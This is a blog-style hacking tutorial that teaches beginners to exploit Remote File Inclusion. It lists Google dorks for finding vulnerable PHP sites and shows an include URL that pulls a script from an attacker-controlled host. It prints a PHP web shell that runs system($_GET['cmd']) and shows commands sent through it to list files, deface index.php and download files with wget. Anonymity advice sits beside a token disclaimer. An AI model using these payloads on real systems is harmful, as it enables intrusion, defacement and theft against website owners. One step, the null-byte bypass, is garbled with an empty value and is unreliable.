Remote File Inclusion
Ever heard of RFI? Well, this is the guide on how to do it!
Ever heard of RFI? Well, this is the guide on how to do it!
Introduction
RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom-coded/malicious file on a website or server using a script. The vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript).
Whoa there buddy, that was pretty technical. If you didn't understand that, either because you're new to hacking or a script kiddie, calm down. Put in the simplest of terms, we can use this method to deface a website. Yay! Script kiddies rejoice!
Now, before you go all "get back to the SQLI" on me, let me just say, RFI is an EXTREMELY common exploit. In fact, its definitely equally as popular as SQLI, its just a whole lot less famous. If anything, RFI is actually easier than SQLI, and if you follow this tutorial, really doesn't require much skill at all.
Using RFI you can deface a website, steal sensitive information, get access to the server, and really have your way with it.
Without further ado, let's begin.
What You Need to Know
Its not required, but highly suggested, to have some hacking experience. I know I said it was "easier than SQLI", but that's only half true. Once you become a good hacker, you'll find RFI to be insanely simple (and super fun/easy), however in some ways, it is a bit more complex and involved (as far as programming goes).
With this tutorial it won't be hard to follow along, but you will need to pay attention.
It is also likely you'll want some experience using a computer, and some experience programming. By the way, when I say "programming", I mean everything from markup to scripting to assembly.
For RFI, it can be helpful to know HTML, BASH, and especially PHP. You can learn most of them easily online.
D.I.Y. Tutorial
This is a D.I.Y. (do it yourself) tutorial, meaning that after reading this tutorial, or just following along with it, you will be ready to perform this exploit. I would highly suggest that you completely read and understand the entire tutorial prior to beginning.
Remember, if you are actually performing RFI to use a proxy and protect your identity - stay anonymous. Also, please read the disclaimer before beginning.
The first step is to find a vulnerable website. You can do this very quickly and easily by using Google dorks.
Here are five dorks to get you started (each on their own line), however there are literally thousands more.
Code:
/includes/header.php?systempath= /Gallery/displayCategory.php?basepath= /index.inc.php?PATH_Includes= /nphp/nphpd.php?nphp_config[LangFile]= /include/db.php?GLOBALS[rootdp]=
If you don't know how to use Google dorks, well, you really better learn how, as they're vital to any form of hacking (and even just effectively using Google). There's no sense in reinventing the wheel in this tutorial.
Okay, let's assume that we have successfully located an exploitable website (a website vulnerable to RFI).
For now, we'll call our victim site (the site we are exploiting) "http://victimsite.com/" and our own site (the hacker's site) "http://hackersite.com/".
So, let's say we have our website:
Code:
http://victimsite.com/index.php?page=home
Let's check it out...
Code:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
We can actually break this down into a few parts, for clarity purposes:
http://victimsite.com/index.php?page=http://hackersite.com/badscript.txt
You'll see that the first blue part is where we have the victim's original site. This is the exploitable site that we found through Google dorks.
In red we have our site, or the "hacker's site". This is a site owned/controlled by a hacker.
And finally, in green we have the "bad script", which is the malicious script we'll be including in our attack - badscript.txt is the Remote File in Remote File Inclusion, and the whole thing actually makes up the inclusion process.
Now, if it truly is vulnerable website, one of three cases will happen:
- Case 1 - You might have noticed that the URL consisted of “page=home” had no extension, but I have included an extension in my URL, hence the site may give an error like “failure to include badscript.txt.txt”, this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- Case 2 - In this case, it automatically appends something in the lines of .php then we have to use a null byte “” in order to avoid error.
- Case 3 – Successful execution - you hacked it
Now, once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy.
Examine the code below:
Code:
<?php echo "<script>alert(U 4r3 0wn3d !!);</script>"; echo "Run command: ".htmlspecialchars($_GET['cmd']); system($_GET['cmd']); ?>
So, if you are in luck and if it worked, let's try out some Linux commands. For example, to find the current working directory of server and then to list files, we will be using “pwd” and “ls” commands.
Code:
http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
Code:
cmd=echo HACKED> index.php
Want to download stuff? Try the “wget” function ("cmd=wget..." get the idea...?). Want to move it out? Try the "mv" function.
The rest is up to your own brilliant mind.
Disclaimer
RFI (remote file inclusion) is a form of illegal hacking. It is illegal to gain entry to websites without proper permission from the owner of the website and web server. Any hacking techniques in this thread are for educational purposes only. I do not support or partake in illegal hacking. I am not responsible for your actions (or the actions of others). I am not responsible for the consequences of your actions (or the consequences of others). I am not accountable/responsible for how you use this guide.
No comments:
Post a Comment